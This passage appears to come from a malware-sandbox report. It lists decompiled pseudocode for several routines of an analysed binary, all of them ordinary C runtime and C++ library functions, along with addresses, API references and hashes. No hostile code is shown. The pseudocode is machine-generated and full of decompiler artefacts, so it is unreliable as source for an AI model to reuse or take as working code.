				signed int _v44;
				void* _v56;
				signed int _v60;
				intOrPtr* _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				void* _v89;
				void* _v92;
				signed int _v96;
				void* _v97;
				char _v100;
				char _v101;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t102;
				signed int _t113;
				signed int _t117;
				signed int _t126;
				void* _t128;
				signed int _t129;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t136;
				intOrPtr _t139;
				intOrPtr _t143;
				void* _t145;
				signed int _t147;
				intOrPtr _t158;
				signed short* _t159;
				signed int _t168;
				signed int _t174;
				void* _t178;
				void* _t184;
				void* _t190;
				signed int _t200;
				signed int _t201;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t210;

				_t196 = __edx;
				_t102 =  *0x1c3014; // 0x88921fa2
				_v8 = _t102 ^ _t206;
				_t158 = _a4;
				E00195D4D( &_v12, 0);
				_t201 =  *0x1f1140;
				_v16 = _t201;
				_t203 = E0019181F(_t158, E0019178E(_t158, 0x1f114c, __edx, _t201));
				if(_t203 != 0) {
					L5:
					E00195DA5( &_v12);
					return E00197F14(_t203, _t158, _v8 ^ _t206, _t196, _t201, _t203);
				} else {
					if(_t201 == 0) {
						__eflags = E001955F9(__edx,  &_v16, _t158) - 0xffffffff;
						if(__eflags == 0) {
							E00191664();
							asm("int3");
							_push(_t206);
							_t210 = (_t208 & 0xfffffff8) - 0x44;
							_t113 =  *0x1c3014; // 0x88921fa2
							_v36 = _t113 ^ _t210;
							_push(_t158);
							_t159 = _v12;
							_push(_t203);
							_v84 = _v24;
							_t204 = 0;
							_t168 =  *_t159 & 0x0000ffff;
							_v72 = _v20;
							_t117 = _t168;
							_push(_t201);
							_t202 = _v16;
							__eflags = _t168;
							if(_t168 != 0) {
								_t200 = _t117;
								do {
									__eflags = _t200 - _t168;
									_t154 =  !=  ? _t202 : _t202 + 1;
									_t204 = _t204 + 1;
									_t202 =  !=  ? _t202 : _t202 + 1;
									_t200 = _t159[_t204] & 0x0000ffff;
									__eflags = _t200;
								} while (_t200 != 0);
							}
							_v60 = _v60 & 0x00000000;
							_v44 = _v44 & 0x00000000;
							_v40 = 0xf;
							E001921B3( &_v60, _t202, 0);
							_v72 = E00196046(_t159, _t202, _t204, __eflags);
							_v84 = E00194E63(_t159, _t196, _t202, __eflags,  &_v76, 1);
							E001917EE( &_v76);
							_v88 = 0xfffffffe;
							_v101 = 0;
							_t205 = 0;
							_t174 = 0;
							_v100 = 1;
							_v96 = 0;
							__eflags = _t202;
							if(_t202 != 0) {
								while(1) {
									_t126 = _t159[_t205] & 0x0000ffff;
									_t196 = _t126;
									__eflags = _t126;
									if(_t126 != 0) {
									}
									L12:
									_t196 =  *_t159 & 0x0000ffff;
									while(1) {
										__eflags = _t126 - _t196;
										if(_t126 == _t196) {
											goto L15;
										}
										_t205 = _t205 + 1;
										_t126 = _t159[_t205] & 0x0000ffff;
										__eflags = _t126;
										if(_t126 != 0) {
											continue;
										}
										goto L15;
									}
									L15:
									__eflags = _v32 - 0x10;
									_t128 =  >=  ?  *((void*)(_t210 + 0x34)) : _t210 + 0x34;
									__eflags =  *((char*)(_t128 + _t174));
									if( *((char*)(_t128 + _t174)) == 0) {
										_t205 = _t205 + _v84;
										_t129 = _t159[_t205] & 0x0000ffff;
										__eflags = _t129 -  *_t159;
										if(_t129 ==  *_t159) {
											L30:
											__eflags = _v32 - 0x10;
											_t196 =  >=  ?  *((void*)(_t210 + 0x34)) : _t210 + 0x34;
											_t178 = 0x7f;
											__eflags = _v84 - _t178;
											_t179 =  <  ? _v84 & 0x000000ff : _t178;
											_t132 = _v80;
											 *((char*)(( >=  ?  *((void*)(_t210 + 0x34)) : _t210 + 0x34) + _t132)) =  <  ? _v84 & 0x000000ff : _t178;
											_t174 = _t132;
											_v72 = _t174;
											goto L31;
										} else {
											__eflags = _t129;
											if(_t129 == 0) {
												goto L30;
											} else {
												_t136 = E00195658(_v76,  *((intOrPtr*)(_t210 + 0x28)));
												__eflags = _t136;
												if(_t136 != 0) {
													L29:
													__eflags = _v32 - 0x10;
													_t196 =  >=  ?  *((void*)(_t210 + 0x34)) : _t210 + 0x34;
													_t184 = 0x7f;
													__eflags = _v84 - _t184;
													_t185 =  <  ? _v84 & 0x000000ff : _t184;
													_t139 = _v80;
													 *((char*)(( >=  ?  *((void*)(_t210 + 0x34)) : _t210 + 0x34) + _t139)) =  <  ? _v84 & 0x000000ff : _t184;
													_t174 = _t139;
													goto L31;
												} else {
													__eflags = _a16 - 1;
													if(_a16 != 1) {
														 *(_t210 + 0x2c) =  *((intOrPtr*)( *_v68 + 0x20))(_t159[_t205] & 0x0000ffff) & 0x0000ffff;
														_t143 = _v80;
														__eflags =  *((char*)(_t143 + 4));
														if( *((char*)(_t143 + 4)) == 0) {
															E00194D2D(_t143);
															_t143 = _v80;
														}
														_t196 = _v72;
														_t145 =  *((intOrPtr*)( *_v72 + 0x20))( *(_t143 + 6) & 0x0000ffff);
														_t190 = 0;
														__eflags = _v68 - _t145;
													} else {
														_t147 = _v76;
														__eflags =  *((char*)(_t147 + 4));
														if( *((char*)(_t147 + 4)) == 0) {
															E00194D2D(_t147);
														}
														_t196 = _v76;
														_t190 = 0;
														__eflags = _t159[_t205] -  *((intOrPtr*)(_v76 + 6));
													}
													if(__eflags != 0) {
														goto L29;
													} else {
														_t174 = _v88;
														_t133 = 1;
														 *((char*)(_t210 + 0x13)) = 1;
													}
												}
											}
										}
									} else {
										__eflags = _v32 - 0x10;
										_t151 =  >=  ?  *((void*)(_t210 + 0x34)) : _t210 + 0x34;
										_t205 = _t205 +  *((char*)(( >=  ?  *((void*)(_t210 + 0x34)) : _t210 + 0x34) + _t174));
										L31:
										_t133 =  *((intOrPtr*)(_t210 + 0x13));
									}
									L32:
									_t174 = _t174 + 1;
									_v80 = _t174;
									__eflags = _t174 - _t202;
									if(_t174 < _t202) {
										do {
											_t126 = _t159[_t205] & 0x0000ffff;
											_t196 = _t126;
											__eflags = _t126;
											if(_t126 != 0) {
											}
											goto L15;
										} while (_t174 < _t202);
									}
									__eflags = _t133;
									if(_t133 != 0) {
										_t205 = _v76;
										_t134 = E00195658(_v76,  *((intOrPtr*)(_t210 + 0x28)));
										__eflags = _t134;
										if(_t134 == 0) {
											_v84 = _v84 + 1;
											E00194D5B(_t205);
											_v72 = _v72 | 0xffffffff;
											 *((char*)(_t210 + 0x13)) = 0;
											_t205 = 0;
											_t174 = 0;
											_v80 = 0;
											continue;
										}
									}
									goto L36;
								}
							}
							L36:
							E0019218D(_t210 + 0x34);
							__eflags =  *(_t210 + 0x4c) ^ _t210;
							return E00197F14(_v72, _t159,  *(_t210 + 0x4c) ^ _t210, _t196, _t202, _t205);
						} else {
							_t203 = _v16;
							E00196014(__eflags, _t203);
							 *((intOrPtr*)( *_t203 + 4))();
							 *0x1f1140 = _t203;
							goto L5;
						}
					} else {
						_t203 = _t201;
						goto L5;
					}
				}
			}

0x001950b0
0x001950b6
0x001950bd
0x001950c1
0x001950cb
0x001950d0
0x001950db
0x001950eb
0x001950ef
0x00195121
0x00195124
0x00195139
0x001950f1
0x001950f3
0x00195105
0x00195108
0x0019513a
0x0019513f
0x00195140
0x00195146
0x00195149
0x00195150
0x00195157
0x00195158
0x0019515b
0x0019515c
0x00195160
0x00195165
0x00195168
0x0019516c
0x0019516e
0x0019516f
0x00195172
0x00195175
0x00195177
0x00195179
0x00195179
0x0019517f
0x00195182
0x00195183
0x00195185
0x00195189
0x00195189
0x00195179
0x0019518e
0x00195197
0x0019519f
0x001951a7
0x001951b3
0x001951c7
0x001951cb
0x001951d2
0x001951da
0x001951de
0x001951e0
0x001951e2
0x001951ea
0x001951ee
0x001951f0
0x001951f6
0x001951f6
0x001951fa
0x001951fc
0x001951ff
0x001951ff
0x00195201
0x00195201
0x00195204
0x00195204
0x00195207
0x00000000
0x00000000
0x00195209
0x0019520a
0x0019520e
0x00195211
0x00000000
0x00000000
0x00000000
0x00195211
0x00195213
0x00195213
0x0019521c
0x00195221
0x00195225
0x00195240
0x00195244
0x00195248
0x0019524b
0x00195312
0x00195312
0x0019531f
0x00195326
0x00195327
0x0019532e
0x00195331
0x00195335
0x00195338
0x0019533a
0x00000000
0x00195251
0x00195251
0x00195254
0x00000000
0x0019525a
0x00195262
0x00195267
0x00195269
0x001952e8
0x001952e8
0x001952f5
0x001952fc
0x001952fd
0x00195304
0x00195307
0x0019530b
0x0019530e
0x00000000
0x0019526b
0x0019526b
0x0019526f
0x001952a5
0x001952a9
0x001952ad
0x001952b1
0x001952b5
0x001952ba
0x001952ba
0x001952be
0x001952cb
0x001952ce
0x001952d0
0x00195271
0x00195271
0x00195275
0x00195279
0x0019527d
0x0019527d
0x00195282
0x00195286
0x0019528c
0x0019528c
0x001952da
0x00000000
0x001952dc
0x001952dc
0x001952e0
0x001952e2
0x001952e2
0x001952da
0x00195269
0x00195254
0x00195227
0x00195227
0x00195230
0x00195239
0x0019533e
0x0019533e
0x0019533e
0x00195342
0x00195342
0x00195343
0x00195347
0x00195349
0x001951f6
0x001951f6
0x001951fa
0x001951fc
0x001951ff
0x001951ff
0x00000000
0x001951ff
0x001951f6
0x0019534f
0x00195351
0x00195357
0x0019535d
0x00195362
0x00195364
0x00195366
0x0019536c
0x00195371
0x00195378
0x0019537c
0x0019537e
0x00195380
0x00000000
0x00195380
0x00195364
0x00000000
0x00195351
0x001951f6
0x00195389
0x0019538d
0x0019539d
0x001953a7
0x0019510a
0x0019510a
0x0019510e
0x00195118
0x0019511b
0x00000000
0x0019511b
0x001950f5
0x001950f5
0x00000000
0x001950f5
0x001950f3

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001950CB

Part of subcall function 0019178E: std::_Lockit::_Lockit.LIBCPMT ref: 001917AA
Part of subcall function 0019178E: std::_Lockit::~_Lockit.LIBCPMT ref: 001917C6

std::_Facet_Register.LIBCPMT ref: 0019510E
std::_Lockit::~_Lockit.LIBCPMT ref: 00195124
Concurrency::cancel_current_task.LIBCPMT ref: 0019513A

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 2afa1dbcdd6bcacc860c8cd47cde4debf41236eba84584a28b40340964cc432e
Instruction ID: 16160abcfbf5fb3d6178a2a07b661fe832218cd00c8778162f6311051e7457c2
Opcode Fuzzy Hash: 2afa1dbcdd6bcacc860c8cd47cde4debf41236eba84584a28b40340964cc432e
Instruction Fuzzy Hash: E001D632A00518EBCF15EBA898919BD77B5EF55750F100569FA11A7281DF309E458790

Uniqueness

Uniqueness Score: -1.00%

Function 00194EF3 Relevance: 6.1, APIs: 4, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00194EF3(void* __ebx, void* __edx, void* __edi, void* __eflags, void* _a4, void _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				signed int _v24;
				void* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int __esi;
				signed int _t44;
				void* _t59;
				intOrPtr* _t66;
				void* _t70;
				void* _t72;
				void* _t73;
				intOrPtr* _t74;
				signed int _t77;
				signed int _t80;

				_t67 = __edx;
				_t77 = _t80;
				_t44 =  *0x1c3014; // 0x88921fa2
				_v8 = _t44 ^ _t77;
				_push(__ebx);
				_push(__edi);
				E00195D4D( &_v12, 0);
				_v16 =  *0x1f1148;
				_t72 = E0019181F(_a4, E0019178E(_a4, 0x1f1150, __edx,  *0x1f1148));
				if(_t72 != 0) {
					L6:
					E00195DA5( &_v12);
					_pop(_t70);
					_pop(_t73);
					__eflags = _v8 ^ _t77;
					_pop(_t59);
					return E00197F14(_t72, _t59, _v8 ^ _t77, _t67, _t70, _t73);
				} else {
					__eflags = __edi;
					if(__edi == 0) {
						__eax =  &_v16;
						__eax = E0019568F(__ebx,  &_v16, __ebx);
						_pop(__ecx);
						_pop(__ecx);
						__eflags = __eax - 0xffffffff;
						if(__eflags == 0) {
							__eax = E00191664();
							asm("int3");
							_push(0x18);
							0x1b36f5 = E0019826F(0x1b36f5, __ebx, __edi, __esi);
							__ebx = __ecx;
							__eax = _a4;
							_v28 = __eax;
							__eax = __eax -  *__ebx;
							_v24 = __eax;
							 *(__ebx + 4) =  *(__ebx + 4) -  *__ebx;
							__eax =  *(__ebx + 4) -  *__ebx >> 2;
							__esi = 0x3fffffff;
							__eflags = __eax - 0x3fffffff;
							if(__eflags == 0) {
								__eax = E001956D9(__ebx, __ecx, __edi, __eflags);
								goto L18;
							} else {
								__edi = __eax + 1;
								_v36 = __edi;
								 *(__ebx + 8) =  *(__ebx + 8) -  *__ebx;
								__ecx =  *(__ebx + 8) -  *__ebx >> 2;
								__edx = __ecx;
								__edx = __ecx >> 1;
								0x3fffffff = 0x3fffffff - __edx;
								__eflags = __ecx - 0x3fffffff - __edx;
								if(__ecx <= 0x3fffffff - __edx) {
									__eax = __ecx + __edx;
									__esi = __edi;
									__eflags = __eax - __edi;
									__esi =  >=  ? __eax : __edi;
									_v32 = __esi;
									__eflags = __esi - 0x3fffffff;
									if(__esi > 0x3fffffff) {
										L18:
										L1();
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										__eax = _v12;
										__ecx = __eax + 0x23;
										__eflags = __ecx - __eax;
										if(__eflags <= 0) {
											_push(_t77);
											_t66 =  &_v32;
											E001912A6(_t66);
											E0019938D( &_v32, 0x1c2844);
											asm("int3");
											_push(_t72);
											_t74 = _t66;
											E00191234(_t66, _v36);
											 *_t74 = 0x1b4288;
											return _t74;
										} else {
											__eax = E00197F22(__esi, __eflags, __ecx);
											_pop(__ecx);
											__ecx = __eax;
											__eflags = __ecx;
											if(__eflags == 0) {
												_push(__esi);
												__esi = __esi ^ __esi;
												__eax = E001A00DB(__ecx, __esi, __eflags, __esi, __esi, __esi, __esi, __esi);
												_push(__esi);
												_push(__esi);
												_push(__esi);
												_push(__esi);
												_push(__esi);
												L24();
												asm("int3");
												__eax = IsProcessorFeaturePresent(0x17);
												__eflags = __eax;
												if(__eax != 0) {
													__ecx = 5;
													asm("int 0x29");
												}
												__esi = 0xc0000417;
												__eax = E0019FF93(__ebx, __edx, 0xc0000417, 2, 0xc0000417, 1);
												__eax = GetCurrentProcess();
												__eax = TerminateProcess(__eax, 0xc0000417);
												__esi = __esi;
												return __eax;
											} else {
												_t42 = __ecx + 0x23; // 0x23
												__eax = _t42;
												__eax = _t42 & 0xffffffe0;
												__eflags = __eax;
												 *(__eax - 4) = __ecx;
												return __eax;
											}
										}
									} else {
										goto L11;
									}
								} else {
									_v32 = 0x3fffffff;
									L11:
									__edi = E00192AAC(__ebx, __ebp, __esi << 2);
									_v40 = __edi;
									_v8 = _v8 & 0x00000000;
									__eax = _v24;
									__eax = __edi + _v24 * 4;
									_v24 = __eax;
									_a8 =  *_a8;
									 *__eax =  *_a8;
									__eax =  *(__ebx + 4);
									__ecx = _v28;
									__eflags = __ecx - __eax;
									if(__ecx != __eax) {
										__eax = E00198BD0(__edi,  *__ebx, __ecx);
										_v24 = _v24 + 4;
										__eax =  *(__ebx + 4);
										__edx = _v28;
										__eax =  *(__ebx + 4) - __edx;
										__eflags = __eax;
										_push(__eax);
										_push(__edx);
										_push(_v24 + 4);
									} else {
										_push(__eax);
										_push( *__ebx);
										_push(__edi);
									}
									__eax = E00198BD0();
									__esp = __esp + 0xc;
									_t36 =  &_v8;
									 *_t36 = _v8 | 0xffffffff;
									__eflags =  *_t36;
									__ecx = __ebx;
									__eax = E001956E4(__ebx, __edi, _v36, __esi);
									__eax = _v24;
									return E001981D4(_v24);
								}
							}
						} else {
							__esi = _v16;
							E00196014(__eflags, __esi) =  *__esi;
							__ecx = __esi;
							__eax =  *((intOrPtr*)( *__esi + 4))();
							 *0x1f1148 = __esi;
							goto L6;
						}
					} else {
						__esi = __edi;
						goto L6;
					}
				}
			}

0x00194ef3
0x00194ef4
0x00194ef9
0x00194f00
0x00194f03
0x00194f0b
0x00194f0e
0x00194f1e
0x00194f2e
0x00194f32
0x00194f64
0x00194f67
0x00194f71
0x00194f72
0x00194f73
0x00194f75
0x00194f7c
0x00194f34
0x00194f34
0x00194f36
0x00194f3c
0x00194f41
0x00194f46
0x00194f47
0x00194f48
0x00194f4b
0x00194f7d
0x00194f82
0x00194f83
0x00194f8a
0x00194f8f
0x00194f91
0x00194f94
0x00194f97
0x00194f9c
0x00194fa2
0x00194fa4
0x00194fa7
0x00194fac
0x00194fae
0x00195075
0x00000000
0x00194fb4
0x00194fb4
0x00194fb7
0x00194fbd
0x00194fbf
0x00194fc2
0x00194fc4
0x00194fc8
0x00194fca
0x00194fcc
0x00195008
0x0019500b
0x0019500d
0x0019500f
0x00195012
0x00195015
0x0019501b
0x0019507a
0x0019507a
0x0019507f
0x00195080
0x00195081
0x00195082
0x00195083
0x00195084
0x00195085
0x00195089
0x0019508c
0x0019508e
0x001912be
0x001912c4
0x001912c7
0x001912d5
0x001912da
0x001912db
0x001912e0
0x001912e2
0x001912e7
0x001912f0
0x00195094
0x00195095
0x0019509a
0x0019509b
0x0019509d
0x0019509f
0x001a0151
0x001a0152
0x001a0159
0x001a0161
0x001a0162
0x001a0163
0x001a0164
0x001a0165
0x001a0166
0x001a016b
0x001a016e
0x001a0174
0x001a0176
0x001a017a
0x001a017b
0x001a017b
0x001a0180
0x001a0188
0x001a0191
0x001a0198
0x001a019e
0x001a019f
0x001950a1
0x001950a1
0x001950a1
0x001950a4
0x001950a4
0x001950a7
0x001950aa
0x001950aa
0x0019509f
0x0019501d
0x00000000
0x0019501d
0x00194fce
0x00194fce
0x00194fd1
0x00194fdd
0x00194fdf
0x00194fe2
0x00194fe6
0x00194fe9
0x00194fec
0x00194ff2
0x00194ff4
0x00194ff6
0x00194ff9
0x00194ffc
0x00194ffe
0x00195025
0x00195030
0x00195033
0x00195036
0x00195039
0x00195039
0x0019503b
0x0019503c
0x0019503d
0x00195000
0x00195002
0x00195003
0x00195005
0x00195005
0x0019503e
0x00195043
0x00195046
0x00195046
0x00195046
0x0019504f
0x00195051
0x00195056
0x0019505e
0x0019505e
0x00194fcc
0x00194f4d
0x00194f4d
0x00194f56
0x00194f59
0x00194f5b
0x00194f5e
0x00000000
0x00194f5e
0x00194f38
0x00194f38
0x00000000
0x00194f38
0x00194f36

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00194F0E

Part of subcall function 0019178E: std::_Lockit::_Lockit.LIBCPMT ref: 001917AA
Part of subcall function 0019178E: std::_Lockit::~_Lockit.LIBCPMT ref: 001917C6

std::_Facet_Register.LIBCPMT ref: 00194F51
std::_Lockit::~_Lockit.LIBCPMT ref: 00194F67
Concurrency::cancel_current_task.LIBCPMT ref: 00194F7D

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: d01aaeb6a6c3b825a50ef8064ac37c4bb8d7cee42142e549b64bc35cc9d09463
Instruction ID: cb0977200be241456f63123de000ced72c7c746256e9405a6422e58660778e24
Opcode Fuzzy Hash: d01aaeb6a6c3b825a50ef8064ac37c4bb8d7cee42142e549b64bc35cc9d09463
Instruction Fuzzy Hash: D701F532A00219FBCF15FFB89881CBEB7B5AF94760B100158F622A7281DF30AE458790

Uniqueness

Uniqueness Score: -1.00%

Function 001B2668 Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E001B2668(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x1c3a70, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E001B2651();
					E001B2613();
					_t13 = WriteConsoleW( *0x1c3a70, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x001b2685
0x001b2689
0x001b2696
0x001b269b
0x001b26b6
0x001b26b6
0x001b26bc

APIs

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,001B16D2,00000000,00000001,00000000,00000000,?,001AA236,?,00000000,00000000), ref: 001B267F
GetLastError.KERNEL32(?,001B16D2,00000000,00000001,00000000,00000000,?,001AA236,?,00000000,00000000,?,00000000,?,001AA782,?), ref: 001B268B

Part of subcall function 001B2651: CloseHandle.KERNEL32(FFFFFFFE,001B269B,?,001B16D2,00000000,00000001,00000000,00000000,?,001AA236,?,00000000,00000000,?,00000000), ref: 001B2661

___initconout.LIBCMT ref: 001B269B

Part of subcall function 001B2613: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001B2642,001B16BF,00000000,?,001AA236,?,00000000,00000000,?), ref: 001B2626

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,001B16D2,00000000,00000001,00000000,00000000,?,001AA236,?,00000000,00000000,?), ref: 001B26B0

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 3ff1b7f02becbe0b54221c4d1bbf30cd8662f4eda50c2337fc7c11ae066f29df
Instruction ID: d3b344c8b2e272a9d2a9692bdbd616143efffa1b12da8ee400a9a3b09e5bbace
Opcode Fuzzy Hash: 3ff1b7f02becbe0b54221c4d1bbf30cd8662f4eda50c2337fc7c11ae066f29df
Instruction Fuzzy Hash: 7FF01C36400128BBCF226FE5EC09AC93F66FB593A1B008511FE1AC6521D732D9A09F91

Uniqueness

Uniqueness Score: -1.00%

Function 001A4FDD Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001A4FDD() {

				E001A71B2( *0x1f1024);
				 *0x1f1024 = 0;
				E001A71B2( *0x1f1028);
				 *0x1f1028 = 0;
				E001A71B2( *0x1f0cfc);
				 *0x1f0cfc = 0;
				E001A71B2( *0x1f0d00);
				 *0x1f0d00 = 0;
				return 1;
			}

0x001a4fe6
0x001a4ff3
0x001a4ff9
0x001a5004
0x001a500a
0x001a5015
0x001a501b
0x001a5023
0x001a502c

APIs

_free.LIBCMT ref: 001A4FE6

Part of subcall function 001A71B2: HeapFree.KERNEL32(00000000,00000000,?,001AE36C,?,00000000,?,?,?,001AE60F,?,00000007,?,?,001AEB02,?), ref: 001A71C8
Part of subcall function 001A71B2: GetLastError.KERNEL32(?,?,001AE36C,?,00000000,?,?,?,001AE60F,?,00000007,?,?,001AEB02,?,?), ref: 001A71DA

_free.LIBCMT ref: 001A4FF9
_free.LIBCMT ref: 001A500A
_free.LIBCMT ref: 001A501B

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1774a1cdbd4be3942f785b21765e46f00a6c91beec4881d29b115582b5bb6e24
Instruction ID: 58bee6de308102365bc2bdc9217316f857c67ac22c42f92ddf5a93a98cc4b62c
Opcode Fuzzy Hash: 1774a1cdbd4be3942f785b21765e46f00a6c91beec4881d29b115582b5bb6e24
Instruction Fuzzy Hash: A8E08C79C041A0FA87136F51BC018B93EE2E7AD710780404AF80802A3ACF390AD6DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 001A230D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 001A239D

Strings

pow, xrefs: 001A2375, 001A2392

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 461a1e38727b755da18c44d018fd43d211c5563728fe6b86a13e0028e3e16a1f
Instruction ID: 48180f0aff0878c9200d0ba2a72920b1455f0d3f1a77238f9fe9da8a485b7ec4
Opcode Fuzzy Hash: 461a1e38727b755da18c44d018fd43d211c5563728fe6b86a13e0028e3e16a1f
Instruction Fuzzy Hash: 20518B68A0D14296CF15BB1CCD8137A2B94EF57710F208999E491822EEEF388CC4DB52

Uniqueness

Uniqueness Score: -1.00%

Function 0019768B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0019768B(void* __ecx, signed char* _a4, signed char* _a8, signed int _a12, signed int* _a16) {
				char _v5;
				char _v6;
				signed int _v12;
				signed char* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed char* _v32;
				void* __ebx;
				signed int* _t39;
				signed int _t40;
				void* _t41;
				char _t42;
				signed char* _t43;
				signed int _t44;
				signed char _t45;
				signed char _t46;
				signed char _t47;
				void* _t52;
				signed char* _t56;
				signed char _t61;
				signed char* _t63;
				signed int _t65;
				void* _t66;
				signed int _t67;
				void* _t69;
				signed char* _t74;
				signed char** _t75;
				void* _t77;
				signed char* _t78;
				signed int _t79;
				signed int _t83;
				signed int _t85;
				signed char* _t87;
				void* _t89;
				void* _t90;

				_t66 = __ecx;
				_t39 = _a16;
				_t90 = _t89 - 0x1c;
				if(_t39 != 0) {
					 *_t39 =  *_t39 & 0x00000000;
				}
				_t63 = _a4;
				_t87 = _t63;
				_t40 =  *_t63 & 0x000000ff;
				L4:
				_t41 = E001A01A0(_t63, _t66, _t79, _t40);
				_pop(_t66);
				if(_t41 != 0) {
					_t87 =  &(_t87[1]);
					__eflags = _t87;
					_t40 =  *_t87 & 0x000000ff;
					goto L4;
				}
				_t42 =  *_t87;
				_v6 = _t42;
				if(_t42 == 0x2d || _t42 == 0x2b) {
					_t87 =  &(_t87[1]);
					__eflags = _t87;
				} else {
					_v6 = 0x2b;
				}
				_t83 = _a12;
